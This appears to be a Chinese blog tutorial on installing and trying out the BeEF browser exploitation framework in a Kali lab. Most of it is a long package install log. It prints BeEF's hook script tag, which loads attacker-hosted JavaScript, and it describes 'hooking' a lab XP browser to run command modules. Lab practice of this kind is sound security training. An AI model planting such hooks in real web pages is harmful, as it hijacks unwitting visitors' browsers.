准备解压 .../27-ruby-activesupport_2%3a6.1.4.1+dfsg-8_all.deb  ...
正在解压 ruby-activesupport (2:6.1.4.1+dfsg-8) 并覆盖 (2:6.0.3.7+dfsg-3) ...
准备解压 .../28-ruby-tzinfo_2.0.4-3_all.deb  ...
正在解压 ruby-tzinfo (2.0.4-3) 并覆盖 (1.2.6-1) ...
正在选中未选择的软件包 ruby-activemodel。
准备解压 .../29-ruby-activemodel_2%3a6.1.4.1+dfsg-8_all.deb  ...
正在解压 ruby-activemodel (2:6.1.4.1+dfsg-8) ...
正在选中未选择的软件包 ruby-activerecord。
准备解压 .../30-ruby-activerecord_2%3a6.1.4.1+dfsg-8_all.deb  ...
正在解压 ruby-activerecord (2:6.1.4.1+dfsg-8) ...
正在选中未选择的软件包 ruby-hashie。
准备解压 .../31-ruby-hashie_3.5.5-4_all.deb  ...
正在解压 ruby-hashie (3.5.5-4) ...
正在选中未选择的软件包 ruby-hashie-forbidden-attributes。
准备解压 .../32-ruby-hashie-forbidden-attributes_0.1.1-1.1_all.deb  ...
正在解压 ruby-hashie-forbidden-attributes (0.1.1-1.1) ...
正在选中未选择的软件包 ruby-otr-activerecord。
准备解压 .../33-ruby-otr-activerecord_2.0.3-3_all.deb  ...
正在解压 ruby-otr-activerecord (2.0.3-3) ...
正在选中未选择的软件包 ruby-parseconfig。
准备解压 .../34-ruby-parseconfig_1.0.8-1_all.deb  ...
正在解压 ruby-parseconfig (1.0.8-1) ...
正在选中未选择的软件包 imagemagick-6.q16。
准备解压 .../35-imagemagick-6.q16_8%3a6.9.11.60+dfsg-1.3+b1_amd64.deb  ...
正在解压 imagemagick-6.q16 (8:6.9.11.60+dfsg-1.3+b1) ...
正在选中未选择的软件包 imagemagick。
准备解压 .../36-imagemagick_8%3a6.9.11.60+dfsg-1.3+b1_amd64.deb  ...
正在解压 imagemagick (8:6.9.11.60+dfsg-1.3+b1) ...
正在选中未选择的软件包 gsfonts。
准备解压 .../37-gsfonts_1%3a8.11+urwcyr1.0.7~pre44-4.5_all.deb  ...
正在解压 gsfonts (1:8.11+urwcyr1.0.7~pre44-4.5) ...
正在选中未选择的软件包 ruby-mojo-magick。
准备解压 .../38-ruby-mojo-magick_0.5.6-2_all.deb  ...
正在解压 ruby-mojo-magick (0.5.6-2) ...
正在选中未选择的软件包 ruby-rqrcode-core。
准备解压 .../39-ruby-rqrcode-core_0.1.2-1_all.deb  ...
正在解压 ruby-rqrcode-core (0.1.2-1) ...
正在选中未选择的软件包 ruby-qr4r。
准备解压 .../40-ruby-qr4r_0.4.1-2_all.deb  ...
正在解压 ruby-qr4r (0.4.1-2) ...
正在选中未选择的软件包 ruby-rack。
准备解压 .../41-ruby-rack_2.2.3-4_all.deb  ...
正在解压 ruby-rack (2.2.3-4) ...
正在选中未选择的软件包 ruby-rack-protection。
准备解压 .../42-ruby-rack-protection_2.0.8.1-2_all.deb  ...
正在解压 ruby-rack-protection (2.0.8.1-2) ...
正在选中未选择的软件包 ruby-celluloid。
准备解压 .../43-ruby-celluloid_0.16.0-5_all.deb  ...
正在解压 ruby-celluloid (0.16.0-5) ...
正在选中未选择的软件包 ruby-celluloid-io。
准备解压 .../44-ruby-celluloid-io_0.16.2-5_all.deb  ...
正在解压 ruby-celluloid-io (0.16.2-5) ...
正在选中未选择的软件包 ruby-rubydns。
准备解压 .../45-ruby-rubydns_1.0.3-3_all.deb  ...
正在解压 ruby-rubydns (1.0.3-3) ...
正在选中未选择的软件包 ruby-http-accept。
准备解压 .../46-ruby-http-accept_1.7.0-2_all.deb  ...
正在解压 ruby-http-accept (1.7.0-2) ...
正在选中未选择的软件包 ruby-unf-ext。
准备解压 .../47-ruby-unf-ext_0.0.7.7-1+b1_amd64.deb  ...
正在解压 ruby-unf-ext (0.0.7.7-1+b1) ...
正在选中未选择的软件包 ruby-unf。
准备解压 .../48-ruby-unf_0.1.4-2_all.deb  ...
正在解压 ruby-unf (0.1.4-2) ...
正在选中未选择的软件包 ruby-domain-name。
准备解压 .../49-ruby-domain-name_0.5.20190701-1_all.deb  ...
正在解压 ruby-domain-name (0.5.20190701-1) ...
正在选中未选择的软件包 ruby-http-cookie。
准备解压 .../50-ruby-http-cookie_1.0.3-1_all.deb  ...
正在解压 ruby-http-cookie (1.0.3-1) ...
正在选中未选择的软件包 ruby-netrc。
准备解压 .../51-ruby-netrc_0.11.0-3_all.deb  ...
正在解压 ruby-netrc (0.11.0-3) ...
正在选中未选择的软件包 ruby-rest-client。
准备解压 .../52-ruby-rest-client_2.1.0-1_all.deb  ...
正在解压 ruby-rest-client (2.1.0-1) ...
正在选中未选择的软件包 ruby-rushover。
准备解压 .../53-ruby-rushover_0.3.0-2_all.deb  ...
正在解压 ruby-rushover (0.3.0-2) ...
正在选中未选择的软件包 ruby-ruby2-keywords。
准备解压 .../54-ruby-ruby2-keywords_0.0.5-1_all.deb  ...
正在解压 ruby-ruby2-keywords (0.0.5-1) ...
正在选中未选择的软件包 ruby-mustermann。
准备解压 .../55-ruby-mustermann_1.1.1-1_all.deb  ...
正在解压 ruby-mustermann (1.1.1-1) ...
正在选中未选择的软件包 ruby-tilt。
准备解压 .../56-ruby-tilt_2.0.10-2_all.deb  ...
正在解压 ruby-tilt (2.0.10-2) ...
正在选中未选择的软件包 ruby-sinatra。
准备解压 .../57-ruby-sinatra_2.0.8.1-2_all.deb  ...
正在解压 ruby-sinatra (2.0.8.1-2) ...
正在选中未选择的软件包 ruby-slack-notifier。
准备解压 .../58-ruby-slack-notifier_1.5.1-2_all.deb  ...
正在解压 ruby-slack-notifier (1.5.1-2) ...
正在选中未选择的软件包 ruby-sqlite3。
准备解压 .../59-ruby-sqlite3_1.4.2-4_amd64.deb  ...
正在解压 ruby-sqlite3 (1.4.2-4) ...
正在选中未选择的软件包 ruby-sync。
准备解压 .../60-ruby-sync_0.5.0-2_all.deb  ...
正在解压 ruby-sync (0.5.0-2) ...
正在选中未选择的软件包 ruby-tins。
准备解压 .../61-ruby-tins_1.1.0-2_all.deb  ...
正在解压 ruby-tins (1.1.0-2) ...
正在选中未选择的软件包 ruby-term-ansicolor。
准备解压 .../62-ruby-term-ansicolor_1.3.0-1.1_all.deb  ...
正在解压 ruby-term-ansicolor (1.3.0-1.1) ...
正在选中未选择的软件包 ruby-buftok。
准备解压 .../63-ruby-buftok_0.2.0-2_all.deb  ...
正在解压 ruby-buftok (0.2.0-2) ...
正在选中未选择的软件包 ruby-equalizer。
准备解压 .../64-ruby-equalizer_0.0.11-2_all.deb  ...
正在解压 ruby-equalizer (0.0.11-2) ...
正在选中未选择的软件包 ruby-http-form-data。
准备解压 .../65-ruby-http-form-data_2.2.0-1_all.deb  ...
正在解压 ruby-http-form-data (2.2.0-1) ...
正在选中未选择的软件包 ruby-ffi-compiler。
准备解压 .../66-ruby-ffi-compiler_1.0.1-4_all.deb  ...
正在解压 ruby-ffi-compiler (1.0.1-4) ...
正在选中未选择的软件包 ruby-http-parser。
准备解压 .../67-ruby-http-parser_1.2.1-5_amd64.deb  ...
正在解压 ruby-http-parser (1.2.1-5) ...
正在选中未选择的软件包 ruby-http。
准备解压 .../68-ruby-http_4.4.1-5_all.deb  ...
正在解压 ruby-http (4.4.1-5) ...
正在选中未选择的软件包 ruby-memoizable。
准备解压 .../69-ruby-memoizable_0.4.2-2_all.deb  ...
正在解压 ruby-memoizable (0.4.2-2) ...
正在选中未选择的软件包 ruby-multipart-post。
准备解压 .../70-ruby-multipart-post_2.0.0-2_all.deb  ...
正在解压 ruby-multipart-post (2.0.0-2) ...
正在选中未选择的软件包 ruby-naught。
准备解压 .../71-ruby-naught_1.1.0-1_all.deb  ...
正在解压 ruby-naught (1.1.0-1) ...
正在选中未选择的软件包 ruby-simple-oauth。
准备解压 .../72-ruby-simple-oauth_0.3.1-2.1_all.deb  ...
正在解压 ruby-simple-oauth (0.3.1-2.1) ...
正在选中未选择的软件包 ruby-twitter。
准备解压 .../73-ruby-twitter_7.0.0-1_all.deb  ...
正在解压 ruby-twitter (7.0.0-1) ...
正在选中未选择的软件包 libjs-source-map。
准备解压 .../74-libjs-source-map_0.7.0++dfsg2+really.0.6.1-9_all.deb  ...
正在解压 libjs-source-map (0.7.0++dfsg2+really.0.6.1-9) ...
正在选中未选择的软件包 libjs-uglify。
准备解压 .../75-libjs-uglify_2.8.29-8_all.deb  ...
正在解压 libjs-uglify (2.8.29-8) ...
正在选中未选择的软件包 ruby-uglifier。
准备解压 .../76-ruby-uglifier_2.7.2+dfsg-2_all.deb  ...
正在解压 ruby-uglifier (2.7.2+dfsg-2) ...
正在选中未选择的软件包 ruby-daemons。
准备解压 .../77-ruby-daemons_1.1.9-2.1_all.deb  ...
正在解压 ruby-daemons (1.1.9-2.1) ...
正在选中未选择的软件包 thin。
准备解压 .../78-thin_1.8.0-1+b1_amd64.deb  ...
正在解压 thin (1.8.0-1+b1) ...
正在选中未选择的软件包 beef-xss。
准备解压 .../79-beef-xss_0.5.4.0-0kali2_all.deb  ...
正在解压 beef-xss (0.5.4.0-0kali2) ...
正在选中未选择的软件包 geoipupdate。
准备解压 .../80-geoipupdate_4.6.0-1+b3_amd64.deb  ...
正在解压 geoipupdate (4.6.0-1+b3) ...
准备解压 .../81-libgs9_9.55.0~dfsg-3_amd64.deb  ...
正在解压 libgs9:amd64 (9.55.0~dfsg-3) 并覆盖 (9.54.0~dfsg-5) ...
准备解压 .../82-libgs9-common_9.55.0~dfsg-3_all.deb  ...
正在解压 libgs9-common (9.55.0~dfsg-3) 并覆盖 (9.54.0~dfsg-5) ...
正在选中未选择的软件包 ghostscript。
准备解压 .../83-ghostscript_9.55.0~dfsg-3_amd64.deb  ...
正在解压 ghostscript (9.55.0~dfsg-3) ...
正在选中未选择的软件包 libjs-highlight.js。
准备解压 .../84-libjs-highlight.js_9.18.5+dfsg1-1_all.deb  ...
正在解压 libjs-highlight.js (9.18.5+dfsg1-1) ...
正在选中未选择的软件包 libnetpbm10。
准备解压 .../85-libnetpbm10_2%3a10.0-15.4_amd64.deb  ...
正在解压 libnetpbm10 (2:10.0-15.4) ...
正在选中未选择的软件包 netpbm。
准备解压 .../86-netpbm_2%3a10.0-15.4_amd64.deb  ...
正在解压 netpbm (2:10.0-15.4) ...
正在选中未选择的软件包 nodejs-doc。
准备解压 .../87-nodejs-doc_12.22.9~dfsg-1_all.deb  ...
正在解压 nodejs-doc (12.22.9~dfsg-1) ...
正在选中未选择的软件包 ruby-oj:amd64。
准备解压 .../88-ruby-oj_3.13.9-1_amd64.deb  ...
正在解压 ruby-oj:amd64 (3.13.9-1) ...
正在设置 libgs9-common (9.55.0~dfsg-3) ...
正在设置 ruby-http-form-data (2.2.0-1) ...
正在设置 ruby-ansi (1.5.0-1.1) ...
正在设置 ruby-daemons (1.1.9-2.1) ...
正在设置 ruby-rqrcode-core (0.1.2-1) ...
正在设置 ruby-multi-json (1.14.1-1) ...
正在设置 ruby-erubis (2.7.0-3.1) ...
正在设置 ruby-equalizer (0.0.11-2) ...
正在设置 ruby-sync (0.5.0-2) ...
正在设置 libc-l10n (2.33-6) ...
正在设置 ruby-ruby2-keywords (0.0.5-1) ...
正在设置 ruby-hashie (3.5.5-4) ...
正在设置 ruby-mustermann (1.1.1-1) ...
正在设置 libgs9:amd64 (9.55.0~dfsg-3) ...
正在设置 ruby-rack (2.2.3-4) ...
正在设置 ruby-netrc (0.11.0-3) ...
正在设置 ruby-unf-ext (0.0.7.7-1+b1) ...
正在设置 ruby-tzinfo (2.0.4-3) ...
正在设置 ruby-eventmachine:amd64 (1.3~pre20201020-b50c135-4+b1) ...
正在设置 ruby-hitimes:amd64 (1.3.1-1) ...
正在设置 thin (1.8.0-1+b1) ...
update-rc.d: We have no instructions for the thin init script.
update-rc.d: It looks like a non-network service, we enable it.
正在设置 ruby-activesupport (2:6.1.4.1+dfsg-8) ...
正在设置 ruby-http-accept (1.7.0-2) ...
正在设置 libjs-source-map (0.7.0++dfsg2+really.0.6.1-9) ...
正在设置 libjs-uglify (2.8.29-8) ...
正在设置 ruby-msgpack:amd64 (1.4.2-2+b1) ...
正在设置 libnetpbm10 (2:10.0-15.4) ...
正在设置 ghostscript (9.55.0~dfsg-3) ...
正在设置 locales (2.33-6) ...
正在安装新版本配置文件 /etc/locale.alias ...
Generating locales (this might take a while)...
  zh_CN.UTF-8... done
Generation complete.
正在设置 ruby-oj:amd64 (3.13.9-1) ...
正在设置 libnode72:amd64 (12.22.9~dfsg-1) ...
正在设置 lame (3.100-3) ...
正在设置 ruby-naught (1.1.0-1) ...
正在设置 ruby-buftok (0.2.0-2) ...
正在设置 ruby-memoizable (0.4.2-2) ...
正在设置 ruby-slack-notifier (1.5.1-2) ...
正在设置 ruby-maxmind-db (1.1.1-0kali1) ...
正在设置 ruby-tins (1.1.0-2) ...
正在设置 ruby-nio4r (2.5.8-2) ...
正在设置 gsfonts (1:8.11+urwcyr1.0.7~pre44-4.5) ...
正在设置 ruby-msfrpc-client (1.1.2-2) ...
正在设置 ruby-activemodel (2:6.1.4.1+dfsg-8) ...
正在设置 ruby-simple-oauth (0.3.1-2.1) ...
正在设置 ruby-unf (0.1.4-2) ...
正在设置 netpbm (2:10.0-15.4) ...
正在设置 libsonic0:amd64 (0.2.0-11) ...
正在设置 imagemagick-6.q16 (8:6.9.11.60+dfsg-1.3+b1) ...
update-alternatives: 使用 /usr/bin/compare-im6.q16 来在自动模式中提供 /usr/bin/compare (compare)
update-alternatives: 使用 /usr/bin/compare-im6.q16 来在自动模式中提供 /usr/bin/compare-im6 (compare-im6)
update-alternatives: 使用 /usr/bin/animate-im6.q16 来在自动模式中提供 /usr/bin/animate (animate)
update-alternatives: 使用 /usr/bin/animate-im6.q16 来在自动模式中提供 /usr/bin/animate-im6 (animate-im6)
update-alternatives: 使用 /usr/bin/convert-im6.q16 来在自动模式中提供 /usr/bin/convert (convert)
update-alternatives: 使用 /usr/bin/convert-im6.q16 来在自动模式中提供 /usr/bin/convert-im6 (convert-im6)
update-alternatives: 使用 /usr/bin/composite-im6.q16 来在自动模式中提供 /usr/bin/composite (composite)
update-alternatives: 使用 /usr/bin/composite-im6.q16 来在自动模式中提供 /usr/bin/composite-im6 (composite-im6)
update-alternatives: 使用 /usr/bin/conjure-im6.q16 来在自动模式中提供 /usr/bin/conjure (conjure)
update-alternatives: 使用 /usr/bin/conjure-im6.q16 来在自动模式中提供 /usr/bin/conjure-im6 (conjure-im6)
update-alternatives: 使用 /usr/bin/import-im6.q16 来在自动模式中提供 /usr/bin/import (import)
update-alternatives: 使用 /usr/bin/import-im6.q16 来在自动模式中提供 /usr/bin/import-im6 (import-im6)
update-alternatives: 使用 /usr/bin/identify-im6.q16 来在自动模式中提供 /usr/bin/identify (identify)
update-alternatives: 使用 /usr/bin/identify-im6.q16 来在自动模式中提供 /usr/bin/identify-im6 (identify-im6)
update-alternatives: 使用 /usr/bin/stream-im6.q16 来在自动模式中提供 /usr/bin/stream (stream)
update-alternatives: 使用 /usr/bin/stream-im6.q16 来在自动模式中提供 /usr/bin/stream-im6 (stream-im6)
update-alternatives: 使用 /usr/bin/display-im6.q16 来在自动模式中提供 /usr/bin/display (display)
update-alternatives: 使用 /usr/bin/display-im6.q16 来在自动模式中提供 /usr/bin/display-im6 (display-im6)
update-alternatives: 使用 /usr/bin/montage-im6.q16 来在自动模式中提供 /usr/bin/montage (montage)
update-alternatives: 使用 /usr/bin/montage-im6.q16 来在自动模式中提供 /usr/bin/montage-im6 (montage-im6)
update-alternatives: 使用 /usr/bin/mogrify-im6.q16 来在自动模式中提供 /usr/bin/mogrify (mogrify)
update-alternatives: 使用 /usr/bin/mogrify-im6.q16 来在自动模式中提供 /usr/bin/mogrify-im6 (mogrify-im6)
正在设置 ruby-sqlite3 (1.4.2-4) ...
正在设置 libjs-highlight.js (9.18.5+dfsg1-1) ...
正在设置 ruby-parseconfig (1.0.8-1) ...
正在设置 libc6-i386 (2.33-6) ...
正在设置 geoipupdate (4.6.0-1+b3) ...
Created symlink /etc/systemd/system/timers.target.wants/geoipupdate.timer → /lib/systemd/system/geoipupdate.timer.
geoipupdate.service is a disabled or a static unit, not starting it.
正在设置 ruby-tilt (2.0.10-2) ...
正在设置 ruby-fiber-local (1.0.0-2) ...
正在设置 ruby-multipart-post (2.0.0-2) ...
正在设置 ruby-timers (4.1.1-2.1) ...
正在设置 libc-dev-bin (2.33-6) ...
正在设置 ruby-ffi-compiler (1.0.1-4) ...
正在设置 espeak-data:amd64 (1.48.15+dfsg-3) ...
正在设置 libhttp-parser2.9:amd64 (2.9.4-4) ...
正在设置 ruby-celluloid (0.16.0-5) ...
正在设置 ruby-rack-protection (2.0.8.1-2) ...
正在设置 ruby-console (1.10.1-2) ...
正在设置 ruby-hashie-forbidden-attributes (0.1.1-1.1) ...
正在设置 libespeak1:amd64 (1.48.15+dfsg-3) ...
正在设置 espeak (1.48.15+dfsg-3) ...
正在设置 ruby-activerecord (2:6.1.4.1+dfsg-8) ...
正在设置 ruby-sinatra (2.0.8.1-2) ...
正在设置 ruby-celluloid-io (0.16.2-5) ...
正在设置 ruby-rubydns (1.0.3-3) ...
正在设置 ruby-http-parser.rb (0.6.0-6+b1) ...
正在设置 nodejs (12.22.9~dfsg-1) ...
update-alternatives: 使用 /usr/bin/nodejs 来在自动模式中提供 /usr/bin/js (js)
正在设置 ruby-domain-name (0.5.20190701-1) ...
正在设置 ruby-otr-activerecord (2.0.3-3) ...
正在设置 ruby-term-ansicolor (1.3.0-1.1) ...
正在设置 ruby-mojo-magick (0.5.6-2) ...
正在设置 ruby-em-websocket (0.5.1-2) ...
正在设置 imagemagick (8:6.9.11.60+dfsg-1.3+b1) ...
正在设置 nodejs-doc (12.22.9~dfsg-1) ...
正在设置 ruby-http-parser (1.2.1-5) ...
正在设置 ruby-async (1.30.1-1) ...
正在设置 ruby-espeak (1.0.5-1) ...
正在设置 libc6-dev:amd64 (2.33-6) ...
正在设置 ruby-qr4r (0.4.1-2) ...
正在设置 ruby-http-cookie (1.0.3-1) ...
正在设置 ruby-rest-client (2.1.0-1) ...
正在设置 ruby-rushover (0.3.0-2) ...
正在设置 ruby-execjs (2.8.1-1) ...
正在设置 ruby-http (4.4.1-5) ...
正在设置 ruby-async-io (1.32.2-1) ...
正在设置 ruby-uglifier (2.7.2+dfsg-2) ...
正在设置 ruby-twitter (7.0.0-1) ...
正在设置 ruby-async-dns (1.2.5-0kali1) ...
正在设置 beef-xss (0.5.4.0-0kali2) ...
adduser:警告:主目录 /var/lib/beef-xss 不属于您当前创建的用户。
beef-xss.service is a disabled or a static unit not running, not starting it.
正在处理用于 fontconfig (2.13.1-4.2) 的触发器 ...
正在处理用于 kali-menu (2021.4.2) 的触发器 ...
正在处理用于 desktop-file-utils (0.26-1) 的触发器 ...
正在处理用于 hicolor-icon-theme (0.17-2) 的触发器 ...
正在处理用于 libc-bin (2.33-6) 的触发器 ...
正在处理用于 man-db (2.9.4-2) 的触发器 ...
正在处理用于 mailcap (3.70) 的触发器 ...
  1. 使用beef-xss启动beEF软件。第一次启动时会强制要求修改密码,此处修改为kali。
┌──(root💀kali)-[/]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user: 
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; vendor preset: disabled)
     Active: active (running) since Fri 2022-02-25 04:02:22 EST; 5s ago
   Main PID: 18982 (ruby)
      Tasks: 4 (limit: 2269)
     Memory: 76.4M
        CPU: 2.497s
     CGroup: /system.slice/beef-xss.service
             └─18982 ruby /usr/share/beef-xss/beef

225 04:02:26 kali beef[18982]: == 24 CreateAutoloader: migrated (0.0007s) ====================================
225 04:02:26 kali beef[18982]: == 25 CreateXssraysScan: migrating ============================================
225 04:02:26 kali beef[18982]: -- create_table(:xssraysscans, {})
225 04:02:26 kali beef[18982]:    -> 0.0007s
225 04:02:26 kali beef[18982]: == 25 CreateXssraysScan: migrated (0.0007s) ===================================
225 04:02:26 kali beef[18982]: [ 4:02:25][*] BeEF is loading. Wait a few seconds...
225 04:02:26 kali beef[18982]: [ 4:02:26][!] [AdminUI] Error: Could not minify JavaScript file: web_ui_all
225 04:02:26 kali beef[18982]: [ 4:02:26]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
225 04:02:26 kali beef[18982]: [ 4:02:26][!] [AdminUI] Error: Could not minify JavaScript file: web_ui_auth
225 04:02:26 kali beef[18982]: [ 4:02:26]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1... 
  1. 当命令执行完毕后弹出此窗口,账户为beef,密码为我们刚刚修改的kali。
    在这里插入图片描述

3 重要网址

在启动beEF时,终端命令行中出现以下三个重要网址,功能介绍如下:

  1. Web界面管理控制台:http://127.0.0.1:3000/ui/panel。用于查看上钩的鱼儿以及对不同的目标进行管理操作。
  2. shellcode探针:http://127.0.0.1:3000/hook.js,只要有人运行该文件,就会在管理控制台上线(上钩)。
  3. 测试网址:http://127.0.0.1:3000/demos/butcher/index.html,只要有人访问该网站,也会在管理控制台上线(上钩)。
  4. 其他机器访问时则是将上述127.0.0.1换成kali系统的IP地址。

4 简单测试

  1. xinXP系统打开IE浏览器,访问http://192.168.1.128:3000/demos/butcher/index.html,测试能否上钩。
    在这里插入图片描述
  2. 回到Kali系统,在界面管理控制台可以看到已有一条鱼儿上钩。
    在这里插入图片描述
  3. 在Command窗口,存放着一些可以执行的命令,不同颜色命令表示靶机浏览器的反应程度:
    1. 绿色模块:表示模块适用当前用户,并且执行结果对用户不可见;
    2. 灰色模块:模块为在目标浏览器上测试过;
    3. 橙色模块:模块可用,但结果对用户可见;
    4. 红色模块:表示模块不适用当前用户,有些红色模块也可以执行,会有较大反应。
      在这里插入图片描述

5 总结

  1. 掌握beEF的安装与启动方法;
  2. 了解beEF的功能与简单使用。

参考文献

  1. 《beEF官网》
举报

相关推荐

0 条评论